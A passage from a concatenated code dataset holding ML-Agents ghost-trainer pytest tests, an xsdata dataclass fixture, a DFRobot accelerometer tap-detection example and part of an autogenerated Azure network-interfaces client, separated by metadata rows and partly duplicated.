# Fixture dimensions shared by the tests below (passed to mb.setup_mock_brain
# and mb.simulate_rollout).
VECTOR_ACTION_SPACE = [1]  # continuous action sizes
VECTOR_OBS_SPACE = 8  # vector observation size
DISCRETE_ACTION_SPACE = [3, 3, 3, 2]  # branch sizes for discrete actions
BUFFER_INIT_SAMPLES = 513  # number of samples used to pre-fill the update buffer
NUM_AGENTS = 12  # not referenced by the tests visible in this chunk
@pytest.mark.parametrize("use_discrete", [True, False])
def test_load_and_set(dummy_config, use_discrete):
    """Weights copied via load_weights must match the source policy exactly."""
    mock_brain = mb.setup_mock_brain(
        use_discrete,
        False,
        vector_action_space=VECTOR_ACTION_SPACE,
        vector_obs_space=VECTOR_OBS_SPACE,
        discrete_action_space=DISCRETE_ACTION_SPACE,
    )
    trainer_params = dummy_config
    trainer = PPOTrainer(mock_brain.brain_name, 0, trainer_params, True, False, 0, "0")
    trainer.seed = 1
    policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
    policy.create_tf_graph()
    trainer.seed = 20  # otherwise graphs are the same
    to_load_policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
    to_load_policy.create_tf_graph()
    to_load_policy.init_load_weights()
    weights = policy.get_weights()
    load_weights = to_load_policy.get_weights()
    # Before loading, the two (differently seeded) policies are allowed to
    # differ: equality is tolerated, not required, so the mismatch that
    # assert_array_equal would raise is deliberately swallowed here.
    try:
        for w, lw in zip(weights, load_weights):
            np.testing.assert_array_equal(w, lw)
    except AssertionError:
        pass
    # After loading the source weights, every tensor must match exactly.
    to_load_policy.load_weights(weights)
    load_weights = to_load_policy.get_weights()
    for w, lw in zip(weights, load_weights):
        np.testing.assert_array_equal(w, lw)
def test_process_trajectory(dummy_config):
    """The ghost trainer forwards only the learning team's trajectories to the
    wrapped PPO trainer's update buffer; the opposing team's queue is drained
    but its contents are ignored."""
    brain_params_team0 = BrainParameters(
        brain_name="test_brain?team=0",
        vector_observation_space_size=1,
        camera_resolutions=[],
        vector_action_space_size=[2],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    brain_name = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    ).brain_name
    brain_params_team1 = BrainParameters(
        brain_name="test_brain?team=1",
        vector_observation_space_size=1,
        camera_resolutions=[],
        vector_action_space_size=[2],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
    controller = GhostController(100)
    trainer = GhostTrainer(
        ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
    )
    # first policy encountered becomes policy trained by wrapped PPO
    parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
    trainer.add_policy(parsed_behavior_id0, policy)
    trajectory_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
    trainer.subscribe_trajectory_queue(trajectory_queue0)
    # Ghost trainer should ignore this queue because off policy
    parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team1.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
    trainer.add_policy(parsed_behavior_id1, policy)
    trajectory_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
    trainer.subscribe_trajectory_queue(trajectory_queue1)
    time_horizon = 15
    trajectory = make_fake_trajectory(
        length=time_horizon,
        max_step_complete=True,
        vec_obs_size=1,
        num_vis_obs=0,
        action_space=[2],
    )
    trajectory_queue0.put(trajectory)
    trainer.advance()
    # Check that trainer put trajectory in update buffer
    assert trainer.trainer.update_buffer.num_experiences == 15
    trajectory_queue1.put(trajectory)
    trainer.advance()
    # Check that ghost trainer ignored off policy queue
    assert trainer.trainer.update_buffer.num_experiences == 15
    # Check that it emptied the queue
    assert trajectory_queue1.empty()
def test_publish_queue(dummy_config):
    """Snapshot swaps publish to the ghost (team 1) policy queue, while a
    completed training update publishes to the wrapped trainer's (team 0)
    policy queue."""
    brain_params_team0 = BrainParameters(
        brain_name="test_brain?team=0",
        vector_observation_space_size=8,
        camera_resolutions=[],
        vector_action_space_size=[1],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    )
    brain_name = parsed_behavior_id0.brain_name
    brain_params_team1 = BrainParameters(
        brain_name="test_brain?team=1",
        vector_observation_space_size=8,
        camera_resolutions=[],
        vector_action_space_size=[1],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
    controller = GhostController(100)
    trainer = GhostTrainer(
        ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
    )
    # First policy encountered becomes policy trained by wrapped PPO
    # This queue should remain empty after swap snapshot
    policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
    trainer.add_policy(parsed_behavior_id0, policy)
    policy_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
    trainer.publish_policy_queue(policy_queue0)
    # Ghost trainer should use this queue for ghost policy swap
    parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team1.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
    trainer.add_policy(parsed_behavior_id1, policy)
    policy_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
    trainer.publish_policy_queue(policy_queue1)
    # check ghost trainer swap pushes to ghost queue and not trainer
    assert policy_queue0.empty() and policy_queue1.empty()
    trainer._swap_snapshots()
    assert policy_queue0.empty() and not policy_queue1.empty()
    # clear
    policy_queue1.get_nowait()
    mock_brain = mb.setup_mock_brain(
        False,
        False,
        vector_action_space=VECTOR_ACTION_SPACE,
        vector_obs_space=VECTOR_OBS_SPACE,
        discrete_action_space=DISCRETE_ACTION_SPACE,
    )
    buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_brain)
    # Mock out reward signal eval
    buffer["extrinsic_rewards"] = buffer["environment_rewards"]
    buffer["extrinsic_returns"] = buffer["environment_rewards"]
    buffer["extrinsic_value_estimates"] = buffer["environment_rewards"]
    buffer["curiosity_rewards"] = buffer["environment_rewards"]
    buffer["curiosity_returns"] = buffer["environment_rewards"]
    buffer["curiosity_value_estimates"] = buffer["environment_rewards"]
    buffer["advantages"] = buffer["environment_rewards"]
    trainer.trainer.update_buffer = buffer
    # when ghost trainer advance and wrapped trainer buffers full
    # the wrapped trainer pushes updated policy to correct queue
    assert policy_queue0.empty() and policy_queue1.empty()
    trainer.advance()
    assert not policy_queue0.empty() and policy_queue1.empty()
# Allow running this module directly, outside the pytest CLI.
if __name__ == "__main__":
    pytest.main()
| 35.86385 | 87 | 0.74604 | import pytest
import numpy as np
from mlagents.trainers.ghost.trainer import GhostTrainer
from mlagents.trainers.ghost.controller import GhostController
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.ppo.trainer import PPOTrainer
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.tests import mock_brain as mb
from mlagents.trainers.tests.test_trajectory import make_fake_trajectory
from mlagents.trainers.settings import TrainerSettings, SelfPlaySettings
# NOTE(review): the definitions below appear to be a comment-stripped copy of
# the test definitions earlier in this file — confirm before deduplicating.
@pytest.fixture
def dummy_config():
    """Trainer settings with self-play enabled."""
    return TrainerSettings(self_play=SelfPlaySettings())


# Fixture dimensions shared by the tests below.
VECTOR_ACTION_SPACE = [1]  # continuous action sizes
VECTOR_OBS_SPACE = 8  # vector observation size
DISCRETE_ACTION_SPACE = [3, 3, 3, 2]  # branch sizes for discrete actions
BUFFER_INIT_SAMPLES = 513  # samples used to pre-fill the update buffer
NUM_AGENTS = 12  # not referenced by the tests visible in this chunk


@pytest.mark.parametrize("use_discrete", [True, False])
def test_load_and_set(dummy_config, use_discrete):
    """Weights copied via load_weights must match the source policy exactly."""
    mock_brain = mb.setup_mock_brain(
        use_discrete,
        False,
        vector_action_space=VECTOR_ACTION_SPACE,
        vector_obs_space=VECTOR_OBS_SPACE,
        discrete_action_space=DISCRETE_ACTION_SPACE,
    )
    trainer_params = dummy_config
    trainer = PPOTrainer(mock_brain.brain_name, 0, trainer_params, True, False, 0, "0")
    trainer.seed = 1
    policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
    policy.create_tf_graph()
    trainer.seed = 20  # a different seed, so the second graph differs
    to_load_policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
    to_load_policy.create_tf_graph()
    to_load_policy.init_load_weights()
    weights = policy.get_weights()
    load_weights = to_load_policy.get_weights()
    # Pre-load equality is tolerated but not required; a mismatch is swallowed.
    try:
        for w, lw in zip(weights, load_weights):
            np.testing.assert_array_equal(w, lw)
    except AssertionError:
        pass
    # After loading, every weight tensor must match exactly.
    to_load_policy.load_weights(weights)
    load_weights = to_load_policy.get_weights()
    for w, lw in zip(weights, load_weights):
        np.testing.assert_array_equal(w, lw)


def test_process_trajectory(dummy_config):
    """Only the learning team's trajectories reach the wrapped trainer's buffer."""
    brain_params_team0 = BrainParameters(
        brain_name="test_brain?team=0",
        vector_observation_space_size=1,
        camera_resolutions=[],
        vector_action_space_size=[2],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    brain_name = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    ).brain_name
    brain_params_team1 = BrainParameters(
        brain_name="test_brain?team=1",
        vector_observation_space_size=1,
        camera_resolutions=[],
        vector_action_space_size=[2],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
    controller = GhostController(100)
    trainer = GhostTrainer(
        ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
    )
    # First policy encountered becomes the policy trained by the wrapped PPO.
    parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
    trainer.add_policy(parsed_behavior_id0, policy)
    trajectory_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
    trainer.subscribe_trajectory_queue(trajectory_queue0)
    # The ghost trainer should ignore this queue (off-policy team).
    parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team1.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
    trainer.add_policy(parsed_behavior_id1, policy)
    trajectory_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
    trainer.subscribe_trajectory_queue(trajectory_queue1)
    time_horizon = 15
    trajectory = make_fake_trajectory(
        length=time_horizon,
        max_step_complete=True,
        vec_obs_size=1,
        num_vis_obs=0,
        action_space=[2],
    )
    trajectory_queue0.put(trajectory)
    trainer.advance()
    # The learning team's trajectory lands in the update buffer.
    assert trainer.trainer.update_buffer.num_experiences == 15
    trajectory_queue1.put(trajectory)
    trainer.advance()
    # The off-policy queue was ignored (buffer unchanged) but drained.
    assert trainer.trainer.update_buffer.num_experiences == 15
    assert trajectory_queue1.empty()


def test_publish_queue(dummy_config):
    """Snapshot swaps publish to the ghost queue; training updates publish to
    the wrapped trainer's queue."""
    brain_params_team0 = BrainParameters(
        brain_name="test_brain?team=0",
        vector_observation_space_size=8,
        camera_resolutions=[],
        vector_action_space_size=[1],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team0.brain_name
    )
    brain_name = parsed_behavior_id0.brain_name
    brain_params_team1 = BrainParameters(
        brain_name="test_brain?team=1",
        vector_observation_space_size=8,
        camera_resolutions=[],
        vector_action_space_size=[1],
        vector_action_descriptions=[],
        vector_action_space_type=0,
    )
    ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
    controller = GhostController(100)
    trainer = GhostTrainer(
        ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
    )
    # First policy encountered becomes the policy trained by the wrapped PPO;
    # its queue should remain empty after a snapshot swap.
    policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
    trainer.add_policy(parsed_behavior_id0, policy)
    policy_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
    trainer.publish_policy_queue(policy_queue0)
    # The ghost trainer uses this queue for the ghost policy swap.
    parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
        brain_params_team1.brain_name
    )
    policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
    trainer.add_policy(parsed_behavior_id1, policy)
    policy_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
    trainer.publish_policy_queue(policy_queue1)
    # A snapshot swap pushes to the ghost queue, not the trainer's queue.
    assert policy_queue0.empty() and policy_queue1.empty()
    trainer._swap_snapshots()
    assert policy_queue0.empty() and not policy_queue1.empty()
    policy_queue1.get_nowait()  # clear the swapped snapshot
    mock_brain = mb.setup_mock_brain(
        False,
        False,
        vector_action_space=VECTOR_ACTION_SPACE,
        vector_obs_space=VECTOR_OBS_SPACE,
        discrete_action_space=DISCRETE_ACTION_SPACE,
    )
    buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_brain)
    # Stub out reward-signal evaluation with the raw environment rewards.
    buffer["extrinsic_rewards"] = buffer["environment_rewards"]
    buffer["extrinsic_returns"] = buffer["environment_rewards"]
    buffer["extrinsic_value_estimates"] = buffer["environment_rewards"]
    buffer["curiosity_rewards"] = buffer["environment_rewards"]
    buffer["curiosity_returns"] = buffer["environment_rewards"]
    buffer["curiosity_value_estimates"] = buffer["environment_rewards"]
    buffer["advantages"] = buffer["environment_rewards"]
    trainer.trainer.update_buffer = buffer
    # With a full buffer, advancing makes the wrapped trainer push the updated
    # policy to its own queue only.
    assert policy_queue0.empty() and policy_queue1.empty()
    trainer.advance()
    assert not policy_queue0.empty() and policy_queue1.empty()


# Allow running this module directly, outside the pytest CLI.
if __name__ == "__main__":
    pytest.main()
| true | true |
f7fa24d651fbf35d14fa24663e22558ba34c8d90 | 4,531 | py | Python | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
"""
@file tap.py
@brief Single click and double click detection
@copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)
@licence The MIT License (MIT)
@author [fengli](li.feng@dfrobot.com)
@version V1.0
@date 2021-01-16
@get from https://www.dfrobot.com
@https://github.com/DFRobot/DFRobot_IIS2DLPC
"""
import sys
sys.path.append("../..")  # set system path to top
from DFRobot_IIS2DLPC import *
import time

# To drive the module over SPI, keep the two lines below uncommented and wire
# the module to the Raspberry Pi's SPI bus.
RASPBERRY_PIN_CS = 27  # Chip selection pin when SPI is selected
acce = DFRobot_IIS2DLPC_SPI(RASPBERRY_PIN_CS)

# To drive the module over I2C instead, uncomment the line constructing
# DFRobot_IIS2DLPC_I2C below and wire the module to the Raspberry Pi's I2C bus.
I2C_MODE = 0x01  # default use I2C1
ADDRESS_0 = 0x19  # I2C address
#acce = DFRobot_IIS2DLPC_I2C(I2C_MODE ,ADDRESS_0)

acce.begin()
print("chip id :")
print(acce.get_ID())
acce.soft_reset()
'''
  @brief Set the measurement range
  @param range:Range(g)
         RANGE_2G     #/**<±2g>*/
         RANGE_4G     #/**<±4g>*/
         RANGE_8G     #/**<±8g>*/
         RANGE_16G    #/**< ±16g>*/
'''
acce.set_range(acce.RANGE_2G)
acce.set_power_mode(acce.CONT_LOWPWRLOWNOISE_12BIT)
acce.set_data_rate(acce.ODR_800HZ)
# Enable click detection on the Z axis
acce.enable_tap_detection_on_z(True)
# Enable click detection on the Y axis
acce.enable_tap_detection_on_y(True)
# Enable click detection on the X axis
acce.enable_tap_detection_on_x(True)
# The threshold setting in the X direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_x(0.5)
# The threshold setting in the Y direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_y(0.5)
# The threshold setting in the Z direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_z(0.5)
'''
Interval between the two clicks of a double click:
@param th 1 LSB = 32 * 1/ODR(0~15)
@n ODR:Data acquisition frequency
@n example
     |                      High-pass filter cut-off frequency configuration                             |
     |--------------------------------------------------------------------------------------------------|
     |                |    ft [Hz]      |        ft [Hz]       |       ft [Hz]        |       ft [Hz]    |
     |   dur          |Data rate = 25 Hz|  Data rate = 100 Hz  |  Data rate = 400 Hz  | Data rate = 800 Hz|
     |--------------------------------------------------------------------------------------------------|
     |  n             |n*(1s/25)= n*40ms|  n*(1s/100)= n*10ms  | n*(1s/400)= 2.5*nms  | n*(1s/800)= n*1.25ms|
     |--------------------------------------------------------------------------------------------------|
'''
acce.set_tap_dur(3)
'''
Set the click detection mode:
     ONLY_SINGLE        # detect single click only
     BOTH_SINGLE_DOUBLE # detect both single and double clicks
'''
acce.set_tap_mode(acce.BOTH_SINGLE_DOUBLE)
'''
Set the interrupt source of the int1 pin:
          DOUBLE_TAP = 0x08    #/**< Double-tap recognition is routed to INT1 pad>*/
          FF_EVENT = 0x10      #/**< Free-fall recognition is routed to INT1 pad>*/
          WAKEUP_EVENT = 0x20  #/**<Wakeup recognition is routed to INT1 pad>*/
          SINGLE_TAP = 0x40    #/**<Single-tap recognition is routed to INT1 pad.>*/
          TNT_16D = 0x80       #/**<6D recognition is routed to INT1 pad>*/
'''
acce.set_int1_route(acce.DOUBLE_TAP)
time.sleep(0.1)
while True:
    # Poll the tap event and the axis/direction it came from.
    #time.sleep(0.3)
    tap = False
    event = acce.tap_detect()
    direction = acce.get_tap_direction()
    if event == acce.SINGLE_CLICK:
        print ("Tap Detected :")
        tap = True
    elif event == acce.DOUBLE_CLICK:
        print ("Double Tap Detected :")
        tap = True
    if tap == True:
        # Report which axis and sign the click came from.
        if direction == acce.DIR_X_UP:
            print("Click it in the positive direction of x")
        elif direction == acce.DIR_X_DOWN:
            print("Click it in the negative direction of x")
        elif direction == acce.DIR_Y_UP:
            print("Click it in the positive direction of y")
        elif direction == acce.DIR_Y_DOWN:
            print("Click it in the negative direction of y")
        elif direction == acce.DIR_Z_UP:
            print("Click it in the positive direction of z")
        elif direction == acce.DIR_Z_DOWN:
            print("Click it in the negative direction of z")
        tap = False
| 37.446281 | 133 | 0.594571 |
# NOTE(review): this appears to be a comment-stripped copy of the tap demo
# script earlier in this file — confirm before deduplicating.
import sys
sys.path.append("../..")  # make the driver package importable from the repo root
from DFRobot_IIS2DLPC import *
import time

RASPBERRY_PIN_CS = 27  # chip-select pin used for the SPI variant below
acce = DFRobot_IIS2DLPC_SPI(RASPBERRY_PIN_CS)
# I2C constants kept for the (commented-out elsewhere) I2C variant.
I2C_MODE = 0x01
ADDRESS_0 = 0x19

acce.begin()
print("chip id :")
print(acce.get_ID())
acce.soft_reset()
# Configure range, power mode and output data rate.
acce.set_range(acce.RANGE_2G)
acce.set_power_mode(acce.CONT_LOWPWRLOWNOISE_12BIT)
acce.set_data_rate(acce.ODR_800HZ)
# Enable tap detection on all three axes.
acce.enable_tap_detection_on_z(True)
acce.enable_tap_detection_on_y(True)
acce.enable_tap_detection_on_x(True)
# Per-axis tap thresholds: larger values are less sensitive.
acce.set_tap_threshold_on_x(0.5)
acce.set_tap_threshold_on_y(0.5)
acce.set_tap_threshold_on_z(0.5)
acce.set_tap_dur(3)  # window between the two taps of a double tap
acce.set_tap_mode(acce.BOTH_SINGLE_DOUBLE)  # detect single and double taps
acce.set_int1_route(acce.DOUBLE_TAP)  # route double-tap events to INT1
time.sleep(0.1)
while True:
    # Poll the tap event and the axis/direction it came from.
    tap = False
    event = acce.tap_detect()
    direction = acce.get_tap_direction()
    if event == acce.SINGLE_CLICK:
        print ("Tap Detected :")
        tap = True
    elif event == acce.DOUBLE_CLICK:
        print ("Double Tap Detected :")
        tap = True
    if tap == True:
        if direction == acce.DIR_X_UP:
            print("Click it in the positive direction of x")
        elif direction == acce.DIR_X_DOWN:
            print("Click it in the negative direction of x")
        elif direction == acce.DIR_Y_UP:
            print("Click it in the positive direction of y")
        elif direction == acce.DIR_Y_DOWN:
            print("Click it in the negative direction of y")
        elif direction == acce.DIR_Z_UP:
            print("Click it in the positive direction of z")
        elif direction == acce.DIR_Z_DOWN:
            print("Click it in the negative direction of z")
        tap = False
| true | true |
f7fa254eb5afb9b7cbe5f1041ae6c0937b58180f | 501 | py | Python | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Optional
@dataclass
class ProductType:
    """Binding for the ProductType complex type.

    :ivar number: product number; required element with an empty namespace
    :ivar name: product name; required element with an empty namespace
    """

    number: Optional[int] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    name: Optional[str] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
| 18.555556 | 40 | 0.506986 | from dataclasses import dataclass, field
from typing import Optional
@dataclass
class ProductType:
    """Product record with a required ``number`` and ``name`` element."""

    number: Optional[int] = field(
        default=None,
        metadata=dict(type="Element", namespace="", required=True),
    )
    name: Optional[str] = field(
        default=None,
        metadata=dict(type="Element", namespace="", required=True),
    )
| true | true |
f7fa25e2e966613e108674abeb184f3e8636f74f | 46,597 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
"""NetworkInterfacesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
    # Hold references to the shared pipeline client, configuration and
    # (de)serializers; every operation method below uses these.
    self._client = client
    self._serialize = serializer
    self._deserialize = deserializer
    self._config = config
def list_virtual_machine_scale_set_vm_network_interfaces(
    self,
    resource_group_name,  # type: str
    virtual_machine_scale_set_name,  # type: str
    virtualmachine_index,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.NetworkInterfaceListResult"]
    """Gets information about all network interfaces in a virtual machine in a virtual machine scale
    set.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param virtual_machine_scale_set_name: The name of the virtual machine scale set.
    :type virtual_machine_scale_set_name: str
    :param virtualmachine_index: The virtual machine index.
    :type virtualmachine_index: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterfaceListResult"]
    # Caller-supplied 'error_map' entries override these defaults.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2016-09-01"
    accept = "application/json, text/json"

    def prepare_request(next_link=None):
        # Builds the GET request: the first page from the URL template, later
        # pages from the service-provided next_link.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url']  # type: ignore
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
                'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page into (next page link, iterator of elements).
        deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Fetch one page, mapping HTTP errors to typed exceptions.
        request = prepare_request(next_link)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        return pipeline_response

    return ItemPaged(
        get_next, extract_data
    )
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'}  # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
    self,
    resource_group_name,  # type: str
    virtual_machine_scale_set_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.NetworkInterfaceListResult"]
    """Gets all network interfaces in a virtual machine scale set.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param virtual_machine_scale_set_name: The name of the virtual machine scale set.
    :type virtual_machine_scale_set_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterfaceListResult"]
    # Caller-supplied 'error_map' entries override these defaults.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2016-09-01"
    accept = "application/json, text/json"

    def prepare_request(next_link=None):
        # Builds the GET request: the first page from the URL template, later
        # pages from the service-provided next_link.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url']  # type: ignore
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
